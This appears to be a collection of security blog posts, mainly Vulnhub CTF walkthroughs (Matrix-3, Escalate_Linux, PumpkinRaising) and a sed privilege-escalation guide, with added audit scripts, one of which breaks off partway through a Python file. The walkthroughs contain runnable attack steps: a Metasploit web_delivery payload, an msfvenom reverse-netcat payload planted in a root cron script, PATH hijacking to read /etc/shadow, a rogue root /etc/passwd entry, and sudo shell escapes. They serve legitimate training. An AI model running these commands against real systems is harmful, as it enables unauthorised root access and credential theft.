Now paste the sheet we want to decode in the box and click on decode.

Now you get the real hidden message that was behind this Excel file, as we did successfully.

So it is very clear that there are several ways of sending secret messages safely through the art of steganography.

Author: Geet Madan is a Certified Ethical Hacker, Researcher and Technical Writer at Hacking Articles on Information Security. Contact here

The post Steganography: The Art of Concealing appeared first on Hacking Articles.


Today we are going to take on another CTF challenge from the Matrix series. The credit for making this VM goes to “Ajay Verma”; it is another boot2root challenge where we have to root the server and capture the flag to complete the challenge.

You can download this VM here.

Security Level: Intermediate

Penetrating Methodology:

  1. Scanning
     • Netdiscover
     • NMAP
  2. Enumeration
     • Web Directory Search
  3. Exploitation
     • Ghidra
     • SSH
  4. Privilege Escalation
     • Exploiting Sudo rights

Walkthrough: Scanning:

Let's start off by scanning the network and identifying the host IP address. Using Netdiscover we identify our host IP as 192.168.1.104.

Then we used Nmap for port enumeration. We found that port 80 is open, SSH is running on port 6464 and port 7331 is open on the target machine.

nmap -p- -A 192.168.1.104

Enumeration:

As we can see port 80 is open, we tried to open the IP address in our browser but we didn’t find anything useful on the webpage.

So we used dirb for directory enumeration.

dirb http://192.168.1.104

After brute-forcing with dirb, we found a directory named /assets.

We opened the assets directory in the browser and found an image file named Matrix_can-show-you-the-door.png under /assets/img/ URL.

We first opened this image but didn't find anything of use. Then, on looking at the file name properly, we found that the name of the file itself gives us the path forward.

So we used Matrix in the URL as shown in the image below and it worked for us.

From the contents of the Matrix directory, we understood that we have to find the right alphanumeric combination to go ahead.

So after trying multiple combinations we used our little brains more aggressively and made the combination n/e/o/6/4: neo is the name of the main character in the Matrix movie, and 64, I guess, is the favourite number of the creator of this VM because he uses it everywhere.

We downloaded the file secret.gz and found that it's actually a txt file containing the username and password.

file secret.gz
cat secret.gz

On cracking the hashed password with the online tool hashkiller, we found the password to be passwd.

If you remember from the nmap scan we have a port 7331 open and it was protected with Basic Authentication.

So we tried to open the URL http://192.168.1.104:7331 and were prompted for authentication; we used admin:passwd as the username and password and were able to log in successfully.

But we couldn't find anything useful there, so we used dirb with the already obtained username and password for directory bruteforcing.

After bruteforcing, we found a directory named data.

dirb http://192.168.1.104:7331/ -u admin:passwd

In the data directory, we found a file named data which turned out to be a DOS executable.

Exploitation:

We took the help of our best friend in need, Google, to find out how to open a DOS file. After some research, we found a tool named Ghidra for opening it.

After opening the data file in Ghidra we found a username and password: guest:7R1n17yN30

As we already know from our nmap scan that SSH is running on port 6464 on the target machine, we tried to ssh to the target with the username and password found above and were able to log in successfully.

ssh guest@192.168.1.104 -p 6464
id

But we were given a restricted bash (rbash) shell, so we used the -t option to run ssh with bash --noprofile and got a complete shell as the guest user.

Checking the sudo permissions for the guest user, we came to know that this user can run /bin/cp with the permissions of another user, trinity.

ssh guest@192.168.1.104 -p 6464 -t "bash --noprofile"
sudo -l

Privilege Escalation

To elevate to a more privileged user, we created a new ssh key pair and gave read, write and execute permissions to the id_rsa.pub file so that we would be able to copy it to our target location.

ssh-keygen
cd .ssh
chmod 777 id_rsa.pub

Then we took advantage of the sudo permission to copy id_rsa.pub to /home/trinity/.ssh/authorized_keys. Now we can ssh to the target machine as the trinity user using the id_rsa key.

Checking the sudo permissions for trinity, this user can execute the oracle file with root permissions.

cp id_rsa.pub /home/guest
cd ..
sudo -u trinity /bin/cp ./id_rsa.pub /home/trinity/.ssh/authorized_keys
ssh trinity@127.0.0.1 -i ~/.ssh/id_rsa -p 6464
sudo -l

But there was no file named oracle in the /home/trinity directory, so we created an oracle file containing /bin/sh using the echo command. Finally, executing the oracle file with sudo gave us the root shell.

Once you have the root shell you can easily get the flag.

echo "/bin/sh" > oracle
chmod 777 oracle
sudo ./oracle
id
ls
cat flag.txt

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Matrix-3: Vulnhub Walkthrough appeared first on Hacking Articles.


This article will take our readers through Stream Editor (sed), one of the most prominent text-processing utilities on GNU/Linux. It is a brief introductory guide to sed that explains how sed works and how its functionality can be put to supplementary use in privilege escalation.

NOTE: The main objective of publishing the “Linux for pentester” series is to introduce the circumstances and hurdles a pentester may face while solving CTF challenges or OSCP labs based on Linux privilege escalation. Here we do not criticize any kind of misconfiguration that a network or system administrator makes when granting higher permissions on programs, binaries, files etc.

Table of Content

Overview of sed

  • Summary to sed
  • Chief Action achieved using sed
    • Replacement with the sed command
    • Printing and viewing from sed command
    • Deleting lines with sed

Abusing sed

  • SUDO Lab setups for privilege Escalation
  • Exploiting SUDO

Summary to sed

The sed command in Linux/UNIX stands for “stream editor”; it can perform many operations on a file, such as searching, find and replace, insertion or deletion. However, the most common use of sed is substitution, i.e. find and replace. With sed you can edit files without even opening them, which is a much faster way to find and replace something in a file. It is a powerful text stream editor that can do insertion, deletion, search etc. on any file as per the user's requirements. It also supports regular expressions, which allows it to perform complex pattern matching too. To learn more about the “sed” command we will start from its help option.

Note: It's worth remarking that this article omits several commands, as our main concern is the influence of “sed” over privilege escalation.

sed --help

Key actions achieved by “sed”

  • Replacement with the sed command: As we know, sed performs many tasks including insertion, deletion and modification of any file as per user request, so now we will start our journey to explore the utilities of sed one by one.

1.1 Substituting or switching a string: sed is used to replace or swap a string, so whenever we need to replace a string within a file we frame the command as:

nano Ignite.txt
cat Ignite.txt
sed 's/Ignite/Egnyte/' Ignite.txt

In the above command “s” denotes the substitution action, “Ignite” is the search pattern and “Egnyte” is the replacement string. By default, the sed command replaces only the first occurrence of the pattern in each line; it won't replace the second, third… occurrence in the line.

1.2 Substituting the nth occurrence in a line: When we want to replace the nth occurrence (first, second and so on) of a pattern in a line, we use the /1, /2 etc. flags to specify n.

sed 's/Ignite/Egnyte/2' Ignite.txt

Here I'm swapping the 2nd occurrence in each line.

1.3 Substituting all occurrences at once: By default sed replaces only the first occurrence of the pattern in each line, so if we wish to replace every occurrence at once we use the “/g” flag.

sed 's/Ignite/Egnyte/g' Ignite.txt

1.4 Substituting from the nth occurrence onward: “/g” applies the change to every occurrence on each line, so if we want the swapping to start from a specific occurrence we need to mention that value (n) from which we want to make changes.

sed 's/Ignite/Egnyte/3g' Ignite.txt

The above command replaces every occurrence from the nth onward in each line.

Note: In the image below you cannot see any change for the “3g” flag because no line in my file contains a 3rd occurrence of the word; but whenever the word occurs multiple times in a line you will clearly see how it changes from the nth occurrence onward.

1.5 Substituting within a particular range: We can limit sed to replacing the string within a particular range of lines. This is achieved by framing the command as shown below.

sed '1,3 s/Ignite/Egnyte/' Ignite.txt

On running this command, sed replaces “Ignite” from the first line to the third line.

Note: One can use “$” in place of the end index to substitute from the nth line to the last line of the file.

  • Printing and viewing with the sed command: Apart from substituting strings, sed can help in printing and viewing a file as per the user's instructions.

2.1 Duplicating the replaced line with the /p flag: If we want to duplicate the replaced line we can use the “/p” flag, which prints the replaced line twice on the terminal. A line that does not contain the search pattern, and so is not replaced, is printed only once.

sed 's/Ignite/Egnyte/p' Ignite.txt

2.2 Printing only the replaced lines: If a user wants to print only those lines which are substituted, he can use the “-n” option together with the print flag as shown below.

sed -n 's/Ignite/Egnyte/p' Ignite.txt

As the image below shows, with “-n” the print flag outputs only the replaced lines.

2.3 Printing lines with numbers: Just as we use “cat -n” to number the lines of a file, we can achieve the same with sed by framing the command as below.

sed = a.txt | sed 'N; s/^/     /; s/ *\(.\{4,\}\)\n/\1  /'

On running the above command sed prints the output with each line numbered.

2.4 Display a file from line x to y: If we want to view a range of lines, from a start index to an end index, we write the command as:

sed -n '2,4p' Ignite.txt

If we use “d” instead of “p” (and drop “-n”) then sed prints the entire file except the given range.

2.5 Print the nth line of the file: Instead of fixing an end index you can leave it blank if you wish to print only a specific line.

sed -n '4'p Ignite.txt

As the screenshot below shows, with the above command sed prints only the 4th line.

2.6 Print from the nth line to the end of the file: To print a file from its nth line to the last line, frame the command as below:

sed -n '4,$'p Ignite.txt

Here “$” refers to the last line of the file.

2.7 Print only lines matching a pattern: If we want to print only those lines which match the given pattern, we frame the command as:

sed -n /training/p Ignite.txt

The image below shows how this command works: I have printed only the lines that include the word “training”.

2.8 Print lines from a pattern match up to the nth line: We can use a numeric value along with “p” to print from the first line matching the pattern up to the nth line.

sed -n '/cyber/,3p' Ignite.txt

3 Deleting lines with sed: Now we check how we can delete lines from a file with the help of sed.

3.1 Remove a specific line: To delete a particular line within a file, use the “d” command with sed. Here I'm deleting the 3rd line from “Ignite.txt”.

sed '3d' Ignite.txt

3.2 Remove a range of lines: If we wish to delete content within a particular range, we set the “initial index” and “end index” of the file. In the image below, I have deleted lines 3 to 5 of “Ignite.txt” and obtain the remaining file content as output.

sed '3,5d' Ignite.txt

3.3 Remove from the nth to the last line: Instead of fixing an end index, one can use “$” to delete lines up to the end of the file.

sed '2,$d' Ignite.txt

Here “2” is the initial index from which deletion starts and “$” indicates deleting up to the end of the file.

3.4 Remove the last line: If we don't set any index value, “$d” simply deletes only the last line of the file.

sed '$d' Ignite.txt

3.5 Remove lines matching a pattern: Sometimes we not only want to print or view the lines that match a particular pattern but also want to delete them; in that case we frame the command below.

sed '/training/d' Ignite.txt

In the image below sed has deleted all lines that match the word “training”.
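The substitution, printing and deletion forms described above, run side by side against one constructed four-line file so the effect of each flag can be compared. This is an added example, not code from the article; the sample text and function names are assumptions.

```shell
#!/bin/sh
# Added example (not part of the article): exercises the sed forms from
# sections 1.x to 3.x on a constructed file. Note that /g and /Ng act per
# line, not once for the whole file.
set -eu

SAMPLE="$(mktemp)"
# Constructed input: "Ignite" occurs 3, 2, 0 and 1 times on the four lines.
cat > "$SAMPLE" <<'EOF'
Ignite Ignite Ignite training
cyber Ignite security Ignite
plain line
Ignite only once
EOF

# 1.1 default: only the first occurrence on each line is replaced
sub_first()    { sed 's/Ignite/Egnyte/' "$SAMPLE"; }
# 1.2 numeric flag: only the 2nd occurrence on each line
sub_second()   { sed 's/Ignite/Egnyte/2' "$SAMPLE"; }
# 1.3 /g: every occurrence on each line
sub_all()      { sed 's/Ignite/Egnyte/g' "$SAMPLE"; }
# 1.4 /2g: from the 2nd occurrence to the end of each line (GNU extension)
sub_from_2nd() { sed 's/Ignite/Egnyte/2g' "$SAMPLE"; }
# 1.5 address range: substitute only on lines 1-2
sub_range()    { sed '1,2 s/Ignite/Egnyte/' "$SAMPLE"; }
# 2.2 -n with /p: print only the lines that were actually changed
sub_changed()  { sed -n 's/Ignite/Egnyte/p' "$SAMPLE"; }
# 2.5 print a single line by number
print_line3()  { sed -n '3p' "$SAMPLE"; }
# 2.7 print only lines matching a pattern
print_match()  { sed -n '/training/p' "$SAMPLE"; }
# 3.3 delete from line 2 to the end
del_from_2()   { sed '2,$d' "$SAMPLE"; }
# 3.4 delete only the last line ("$" is the last-line address)
del_last()     { sed '$d' "$SAMPLE"; }
# 3.5 delete every line matching a pattern
del_match()    { sed '/training/d' "$SAMPLE"; }

# Prints every form in turn, labelled, so the outputs can be compared.
show_all() {
    for f in sub_first sub_second sub_all sub_from_2nd sub_range \
             sub_changed print_line3 print_match del_from_2 del_last del_match; do
        printf '== %s ==\n' "$f"
        "$f"
    done
}

show_all
```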

Abusing sed Sudo Rights Lab setups for Privilege Escalation

Now we will start our mission of privilege escalation. First, we have to set up our lab with the sed command granted administrative rights. After that, we will check what impact the sudo rights have on the sed command and how we can use it further for privilege escalation.

This can be clearly seen in the image below, in which I have created a local user (test) who holds sudo rights as root and can perform tasks as admin.

To add the sudo right, open the /etc/sudoers file and add the following line under the user privilege specification.

test All=(root) NOPASSWD: /usr/bin/sed

Exploiting Sudo rights

Now we will start exploiting the sed binary by taking advantage of the sudoers permission. For this we must first have a session on the victim's machine; only then can we carry out this task. Suppose we have a session on the victim's machine that gives us local user access to the target system, through which we can escalate to root.

So now we connect to the target machine over ssh; type the following command to log in as the local user.

ssh test@192.168.1.108

Then we check the sudo rights of the “test” user (if any) and find that user “test” can execute the sed command as “root” without a password.

sudo -l

Now we access our /etc/passwd file with the help of the sed command to escalate or maintain access with elevated privileges.

Conclusion: Hence we have successfully exploited “sed” by abusing its functionality after it was granted higher privileges.
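A defender-side check for the sudoers rules used in the ed and sed lab setups above, and for the cp-as-trinity rule from the Matrix-3 walkthrough earlier on this page: it scans a sudoers file for password-less rules that hand out a watch-listed binary. This is an added example, not part of either article or of GTFOBins; the watch-list and the sample sudoers content are assumptions.

```shell
#!/bin/sh
# Added defender-side check (not from the articles): flag NOPASSWD sudoers
# rules whose command is a binary that can open a shell or write files.
# RISKY_BINS is an assumed watch-list: ed, sed and cp come from this page,
# the editors are common additions; extend it for your own hosts.
set -eu

RISKY_BINS="ed sed vi vim cp"

# Constructed sudoers content reproducing the three lab rules on this page,
# plus two rules that should not be flagged (password required / harmless bin).
SUDOERS="$(mktemp)"
cat > "$SUDOERS" <<'EOF'
Defaults        env_reset
# User privilege specification
root    ALL=(ALL:ALL) ALL
test    ALL=(root) NOPASSWD: /bin/ed
test    ALL=(root) NOPASSWD: /usr/bin/sed
guest   ALL=(trinity) NOPASSWD: /bin/cp
deploy  ALL=(root) /usr/bin/systemctl restart app
ops     ALL=(root) NOPASSWD: /usr/bin/ls
EOF

# audit_sudoers FILE
# Prints "user:runas:command" for every rule that carries the NOPASSWD tag
# and names a binary from RISKY_BINS. Comments, blank lines, Defaults lines
# and rules that still prompt for a password are skipped. #include and
# #includedir are not followed: run it on each fragment separately.
audit_sudoers() {
    file="$1"
    grep -v '^[[:space:]]*#' "$file" | grep -v '^[[:space:]]*$' |
    while read -r user spec; do
        # spec looks like: ALL=(root) NOPASSWD: /bin/ed [args]
        case "$spec" in
            *NOPASSWD:*) ;;
            *) continue ;;
        esac
        # The runas list sits between "=(" and ")"; when absent sudo uses root.
        case "$spec" in
            *"=("*) runas="${spec#*"=("}"; runas="${runas%%")"*}" ;;
            *)      runas="root" ;;
        esac
        cmd="${spec#*NOPASSWD:}"   # everything after the tag
        set -f                     # no globbing while splitting into words
        set -- $cmd                # $1 is now the command path
        [ "$#" -gt 0 ] || continue
        bin="${1##*/}"             # basename of the command
        for r in $RISKY_BINS; do
            if [ "$bin" = "$r" ]; then
                printf '%s:%s:%s\n' "$user" "$runas" "$1"
            fi
        done
    done
}

audit_sudoers "$SUDOERS"
```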

Reference link: https://gtfobins.github.io

Author: Komal Singh is a Cyber Security Researcher and Technical Content Writer; she is an enthusiastic pentester and Security Analyst at Ignite Technologies. Contact Here

The post Linux for Pentester: sed Privilege Escalation appeared first on Hacking Articles.


Escalate_Linux is an intentionally vulnerable Linux virtual machine. The main focus of this machine is learning Linux post-exploitation (privilege escalation) techniques. The credit for making this VM goes to “Manish Gupta”; it is a boot2root challenge where the creator wants us to root the machine in twelve different ways. You can download the machine from this link: https://www.vulnhub.com/entry/escalate_linux-1,323/

NOTE: In this article, we have exploited the machine with six different methods.

Security Level: Beginner-Intermediate

Penetrating Methodology:

Scanning

  • Netdiscover
  • Nmap

Enumeration

  • Web Directory Search 

Exploiting

  • Metasploit shell upload
  • sh

Privilege Escalation

  • Method 1: Get root shell by exploiting suid rights of the shell file
  • Method 2: Get a root shell by cracking the root password
  • Method 3: Get root shell by exploiting sudo rights of user1
  • Method 4: Get root shell by exploiting crontab
  • Method 5: Exploiting Sudo rights of vi editor
  • Method 6: Exploiting writable permission of /etc/passwd file

Walkthrough: Scanning:

Let's start off by scanning the network using the Netdiscover tool and identifying the host IP address. We identify our host IP address as 192.168.0.17.

Now let's scan the services and ports of the target machine with nmap.

nmap -A 192.168.0.17

Enumeration:

As we can see port 80 is open, so we tried to open the IP address in our browser and got nothing but the default Apache webpage.

So we used dirb with .php filter for directory enumeration.

dirb http://192.168.0.17/ -X .php

After brute-forcing with dirb, we found a URL named http://192.168.0.17/shell.php

Now we opened the URL in our browser and found that it accepts cmd as a GET parameter.

So we passed the id command in the URL and found its result reflected in the response.

Exploiting

Since the target machine is vulnerable to command injection, we created a web delivery payload using Metasploit.

use exploit/multi/script/web_delivery
set srvhost 192.168.0.12
set lhost 192.168.0.12
exploit

The target host was not able to run the script directly, so we URL-encoded it.

After encoding the script, we were successfully able to run it on the target machine and get the meterpreter session.

We got the bash shell of user6 after using the python one-liner shell command.

To further enumerate the target host, we uploaded the LinEnum tool to it.

upload /root/LinEnum.sh .
shell
python -c 'import pty;pty.spawn("/bin/bash")'
chmod 777 LinEnum.sh
./LinEnum.sh

From the results of the LinEnum scan, we found that the target host has eight users, user1 to user8.

We also found that in crontab a file named autoscript.sh is run every 5 minutes with root privileges.

From the same LinEnum scan, we learned that /etc/passwd is writable by users. We also found that the shell and script files can be run with root privileges because the SUID bit is set on them.

Privilege Escalation:

As mentioned above there are multiple ways to do the privilege escalation of this machine.

We will try to do as many methods as possible.

Method 1: Get root shell by exploiting SUID rights of the shell file

Using the find command we can confirm that the shell file in user3's home directory can be executed with root privileges.

We tried to execute the same file and got the root shell.

find / -perm -u=s -type f 2>/dev/null
cd /home/user3
./shell

Method 2: Get a root shell by cracking the root password

From the above screenshot we know that the script file in user5's home directory runs with root privileges. Using the PATH variable exploitation technique we can read the /etc/shadow file.

To know more about path variable privilege escalation use this link: https://www.hackingarticles.in/linux-privilege-escalation-using-path-variable/

cd /tmp
echo "cat /etc/shadow" > ps
chmod 777 ps
export PATH=/tmp:$PATH
cd /home/user5
./script

On executing ./script, we fetched the contents of the shadow file as shown in the image below.

We copied the root user's password hash into a file named hash and used John the Ripper to crack it. We got the root password, 12345, and then using the su command we were able to become root.

john hash
su root

Method 3: Get root shell by exploiting SUDO rights of user1

We already know by now that the script file can be executed with root privileges.

Using the same script file we can change the password of any user with the help of the PATH variable technique.

Here we used echo and chpasswd to replace the existing password with our new password 12345, then switched to the user1 account using su. On checking the sudoers list for user1 we learned that this user can run all commands via sudo.

So we ran sudo su and got root access.

echo 'echo "user1:12345" | chpasswd' > ls
chmod 777 ls
export PATH=/tmp:$PATH
cd /home/user5
./script
su user1
sudo -l
sudo su

Method 4: Get root shell by exploiting crontab

In the previous screenshot we saw that a task named autoscript.sh is scheduled every 5 minutes for user4 in crontab. We changed the password of user4 the same way as for user1 and then switched to user4 with the new password 12345. There we can see the file autoscript.sh in the Desktop folder.

su user4
ls -la

So we created a payload using msfvenom and copied the code into the autoscript.sh file using echo.

msfvenom -p cmd/unix/reverse_netcat lhost=192.168.0.12 lport=8888 R

echo "code" > autoscript.sh

After copying the code into autoscript.sh we executed the file, started a netcat listener on our Kali machine and waited for the shell.

Yes, we got the root shell, as autoscript.sh is executed as root by cron.

nc -lvp 8888
id

Method 5: Exploiting SUDO rights of vi editor

We changed the password of all users to 12345 using the same technique as above and switched between users to check for more exploits. We found that user8 has sudo permission for the vi editor.

su user8
sudo -l

Open the vi editor with sudo and enter the sh command as shown in the screenshot below; leave the editor and, hurray, we get the root shell.

:!sh
id

And again we obtain the root shell as shown in the image below.

Method 6: Exploiting writable permission of /etc/passwd file

Continuing with the enumeration of users, we found that user7 is a member of the root group, with gid 0.

And we already know from the LinEnum scan that /etc/passwd is writable by users. From this observation we concluded that user7 can edit the /etc/passwd file.

tail /etc/passwd
su user7
id

So we copied the contents of /etc/passwd to our Kali machine and created a new user named raj with root privileges, for which we generated the hash of the password pass123 using openssl.

openssl passwd -1 -salt ignite pass123

As you can observe, we have created a new entry in /etc/passwd for user raj with root privileges.

On the target machine, we downloaded the edited passwd file into the /etc folder using wget.

Then we switched to our newly created user raj and, yes, yet again we proudly got the root shell of the machine.

cd /etc
wget -O passwd http://192.168.0.12:8000/passwd
su raj
id

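Defender-side checks for the misconfigurations the six methods above relied on: a planted uid-0 account and a world-writable /etc/passwd (Method 6), SUID scripts that call commands by bare name and so are open to PATH hijacking (Methods 2 and 3), and a cron job whose script is writable (Method 4). This is an added example, not code from the walkthrough or from LinEnum; it runs against a constructed directory tree so it works offline, and the paths and sample content are assumptions.

```shell
#!/bin/sh
# Added defender-side checks (not from the walkthrough). Each function takes
# a root directory; point them at "/" on a real host. Here ROOT is a
# constructed tree mirroring the Escalate_Linux findings.
set -eu

ROOT="$(mktemp -d)"
mkdir -p "$ROOT/etc" "$ROOT/home/user3" "$ROOT/home/user5" "$ROOT/home/user4/Desktop"

# Constructed /etc/passwd: user7 in gid 0, plus a planted "raj" with uid 0.
# The hash field is a placeholder, not a real hash.
cat > "$ROOT/etc/passwd" <<'EOF'
root:x:0:0:root:/root:/bin/bash
user6:x:1006:1006:user6:/home/user6:/bin/bash
user7:x:1007:0:user7:/home/user7:/bin/bash
raj:$1$ignite$PLACEHOLDERHASH:0:0:raj:/root:/bin/bash
EOF
chmod 666 "$ROOT/etc/passwd"          # world-writable, as LinEnum reported

# Constructed SUID scripts: "script" calls ps by bare name (PATH hijack);
# "shell" uses an absolute path and must not be flagged.
printf '#!/bin/sh\nps aux\n'      > "$ROOT/home/user5/script"
printf '#!/bin/sh\n/bin/ps aux\n' > "$ROOT/home/user3/shell"
chmod 4755 "$ROOT/home/user5/script" "$ROOT/home/user3/shell"

# Constructed system crontab running a script anyone can edit.
printf '*/5 * * * * root /home/user4/Desktop/autoscript.sh\n' > "$ROOT/etc/crontab"
printf '#!/bin/sh\necho tick\n' > "$ROOT/home/user4/Desktop/autoscript.sh"
chmod 777 "$ROOT/home/user4/Desktop/autoscript.sh"

# Accounts other than root whose uid is 0 (planted root-equivalent users).
extra_uid0() { awk -F: '$3 == 0 && $1 != "root" {print $1}' "$1/etc/passwd"; }

# Non-root accounts whose primary group is gid 0.
gid0_members() { awk -F: '$3 != 0 && $4 == 0 {print $1}' "$1/etc/passwd"; }

# "writable" if /etc/passwd is world-writable, otherwise "ok".
passwd_mode() {
    if find "$1/etc/passwd" -perm -002 | grep -q .; then echo writable; else echo ok; fi
}

# SUID interpreter scripts that run a command by bare name, i.e. resolved
# through the caller's PATH rather than an absolute path.
suid_scripts_bare_cmd() {
    find "$1" -type f -perm -4000 | sort | while read -r f; do
        head -n1 "$f" | grep -q '^#!' || continue
        if awk 'NR > 1 && NF > 0 && $1 !~ /^[#\/]/ {hit = 1} END {exit !hit}' "$f"; then
            printf '%s\n' "$f"
        fi
    done
}

# Commands in the system crontab whose target file is world-writable.
writable_cron_targets() {
    root="$1"
    grep -v '^[[:space:]]*#' "$root/etc/crontab" | awk 'NF >= 7 {print $7}' |
    while read -r cmd; do
        [ -f "$root$cmd" ] || continue
        if find "$root$cmd" -perm -002 | grep -q .; then printf '%s\n' "$cmd"; fi
    done
}

printf 'uid-0 accounts: %s\n'   "$(extra_uid0 "$ROOT")"
printf 'gid-0 accounts: %s\n'   "$(gid0_members "$ROOT")"
printf '/etc/passwd: %s\n'      "$(passwd_mode "$ROOT")"
printf 'SUID PATH risk: %s\n'   "$(suid_scripts_bare_cmd "$ROOT")"
printf 'writable cron: %s\n'    "$(writable_cron_targets "$ROOT")"
```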
Conclusion: So in this part 1 of Escalate_Linux we performed privilege escalation by six different methods. In part 2 we will try to exploit the machine by some other methods. So keep visiting Hacking Articles for the next part.

Author: Auqib Wani is a Certified Ethical Hacker, Penetration Tester and a Tech Enthusiast with more than 5 years of experience in the field of Network & Cyber Security. Contact Here

The post Escalate_Linux: Vulnhub Walkthrough (Part 1) appeared first on Hacking Articles.


PumpkinRaising is another CTF challenge from the Mission-Pumpkin v1.0 series, created with beginners in mind; all credit for this VM goes to Jayanth. This level is about identifying 4 pumpkin seeds (4 flags, the seed IDs), gaining root access and capturing the final Flag.txt file.

You can download it from here: https://www.vulnhub.com/entry/mission-pumpkin-v10-pumpkinraising,324/

Level: Beginner to Intermediate

Penetrating Methodologies

Scanning

  • Nmap

Enumeration

  • Robots.txt
  • Abusing HTTP services

Exploiting

  • SSH Login

Privilege Escalation

  • Abusing Sudo rights

Walkthrough

Scanning

Let’s start with network scanning; the IP of this VM is 192.168.0.11. So we begin by scanning for open ports and the services running on them with the help of nmap.

nmap -A 192.168.0.11

From the scan result, I found that port 22 (SSH) and port 80 (HTTP) are open; moreover, it gave a hint about a /robots.txt file that disallows 23 entries.

Enumeration

So first we open a web browser, browse to the VM’s IP and are welcomed by the following web page. Read the message:

“To raise Pumpkins, we need to collect seeds in the first step. Remember Jack? He is the only expert we have in raising healthy Pumpkins. It’s time to get in search of pumpkin seeds”

From this message, we can assume that “Jack” could be a username.

Further, I explored the /robots.txt file suggested by the nmap scan and found a list of interesting directories, files and paths. Among all the entries, a few stood out: /hidden/notes.txt, /underconstruction.html and /seeds/seed.txt.gpg. So we explored each entry one by one.

The hidden notes.txt showed data that might later be needed as login credentials.

http://192.168.0.11/hidden/notes.txt
Robert: C@43r0VqG2=
Mark: Qn@F5zMg4T
goblin: 79675-06172-65206-17765

When I checked the source code of the homepage, I found a link to pumpkin.html.

On exploring the source code of http://192.168.0.11/pumpkin.html, I found a base32-encoded string.

With the help of an online base32 decoder, we decoded the string and noted the path /scripts/spy.pcap, which could be a hint for a seed ID.

To identify what is inside the spy.pcap file, I downloaded it to our local machine and used Wireshark to read the captured packets.

Here I found the first seed, 50609, inside the TCP stream, as shown in the image below.

Returning to the pumpkin.html page, I found a decimal string further down the same file.

On decoding the decimal string, we found one more seed: 96454

As mentioned, we enumerated /robots.txt and found another important file, /underconstruction.html, as shown below. So we explored the source code of that page and noted a hint about an image.

Next we opened the URL below and found a pumpkin picture, which I downloaded to my local machine.

http://192.168.0.11/images/jackolantern.gif

After downloading the pumpkin image, I checked for hidden data with the help of Stegosuite. The image was password protected, and if you remember, we had enumerated the secret key “Mark: Qn@F5zMg4T” from /hidden/notes.txt.

I used the key Qn@F5zMg4T to extract the hidden file “decorative.txt” from the stego image.

When I opened this file, it gave me another PUMP-Ke-Mon pumpkin seed: 86568

Further, I downloaded the .gpg file from the link /seeds/seed.txt.gpg mentioned in the robots.txt file.

wget http://192.168.0.11/seeds.txt.gpg
gpg -d seeds.txt.gpg

When I tried to open the file, I noticed that it requires a passphrase to decrypt the data, which I did not know. I tried the keys enumerated above but could not decrypt it. After many attempts, I successfully decrypted the file by entering SEEDWATERSUNLIGH, which was mentioned on the home page of the website in the 2nd image.

On decrypting it, I obtained the following text file, as shown below; it was Morse-encoded text. Morse code, used in telecommunication, encodes text characters as standardized sequences of two signal durations called dots and dashes.

To decode the Morse text I used CyberChef, an online decoding tool. On decoding the text, I found another seed, BIGMAXPUMPKIN: 69507
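The three hint encodings met during this enumeration (base32, decimal character codes and Morse) are easy to decode offline, which also makes the result reproducible when writing up a CTF. The following decoders are an added example for this page, not code from the walkthrough or from CyberChef; the sample strings are constructed here (base32 of the path the page names, and decimal and Morse encodings of two of the seed values above), and the decimal format assumed is whitespace-separated character codes.

```python
"""Offline decoders for the hint encodings used in PumpkinRaising.
Added example; the samples below are constructed, not copied from the VM."""
import base64
from typing import Dict

# International Morse for letters and digits; '?' is returned for anything else.
MORSE_TABLE: Dict[str, str] = {
    ".-": "A", "-...": "B", "-.-.": "C", "-..": "D", ".": "E", "..-.": "F",
    "--.": "G", "....": "H", "..": "I", ".---": "J", "-.-": "K", ".-..": "L",
    "--": "M", "-.": "N", "---": "O", ".--.": "P", "--.-": "Q", ".-.": "R",
    "...": "S", "-": "T", "..-": "U", "...-": "V", ".--": "W", "-..-": "X",
    "-.--": "Y", "--..": "Z",
    "-----": "0", ".----": "1", "..---": "2", "...--": "3", "....-": "4",
    ".....": "5", "-....": "6", "--...": "7", "---..": "8", "----.": "9",
}

# Constructed samples (assumed encodings, not the strings from the VM).
SAMPLE_B32 = "F5ZWG4TJOB2HGL3TOB4S44DDMFYA===="   # base32("/scripts/spy.pcap")
SAMPLE_DECIMAL = "57 54 52 53 52"                  # char codes of "96454"
SAMPLE_MORSE = "-.... ----. ..... ----- --..."     # Morse for "69507"


def decode_base32(text: str) -> str:
    """Decode base32, tolerating lowercase input and stripped '=' padding."""
    cleaned = text.strip().upper()
    cleaned += "=" * (-len(cleaned) % 8)  # base32 groups are 8 symbols wide
    return base64.b32decode(cleaned).decode("utf-8", errors="replace")


def decode_decimal(text: str) -> str:
    """Decode whitespace-separated decimal character codes ("72 105" -> "Hi")."""
    return "".join(chr(int(token)) for token in text.split())


def decode_morse(text: str) -> str:
    """Decode Morse with spaces between letters and '/' between words."""
    words = []
    for word in text.strip().split("/"):
        letters = [MORSE_TABLE.get(symbol, "?") for symbol in word.split()]
        words.append("".join(letters))
    return " ".join(words)


if __name__ == "__main__":
    print(decode_base32(SAMPLE_B32))
    print(decode_decimal(SAMPLE_DECIMAL))
    print(decode_morse(SAMPLE_MORSE))
```

`decode_base32` re-adds padding because pages often strip the trailing `=` characters, which makes `base64.b32decode` raise; the other two decoders are pure table work.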

As declared by the author, in this VM we need to find 4 seed IDs and a root flag. We have collected all 4 seed IDs, but to get the root flag we need to compromise the VM.

Since I did not find any vulnerability to compromise it, I tried to access SSH using the concatenation of all 4 seeds found in this VM as the password for user jack.

  1. SEED ID: 69507  
  2. SEED ID: 50609
  3. SEED ID: 96454
  4. SEED ID: 86568

ssh jack@192.168.0.11
SSH login Password: 69507506099645486568

Yuppie!! We got shell access, but to obtain the root flag we need to escalate from the low-privilege shell to a higher one. Therefore, I checked the sudo rights of user jack and found that jack can run strace with sudo rights.

Hmmm! We can abuse the sudo permission set on the strace program. Type the following and obtain the root flag.

sudo strace -o/dev/null /bin/bash
cd /root
ls
cat flag.txt
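Both this step and Method 5 of the Escalate_Linux walkthrough above come down to a sudo rule that hands out a program able to spawn a shell (vi there, strace here). From the administrator's side the fix is to review sudoers for such rules and either drop them or add the `NOEXEC:` tag so the granted program cannot execute children. The audit below is an added example for this page, not code from either walkthrough or from sudo; the sudoers lines are constructed, and the flagged-program set is deliberately limited to the two programs the posts mention and is meant to be extended from your own policy.

```python
"""Audit helper that flags sudo rules granting programs known to hand the
caller a shell (vi in Method 5, strace here), plus blanket ALL rules.
Added example with constructed sudoers lines; not from either original post."""
import os
import re
from typing import List, Tuple

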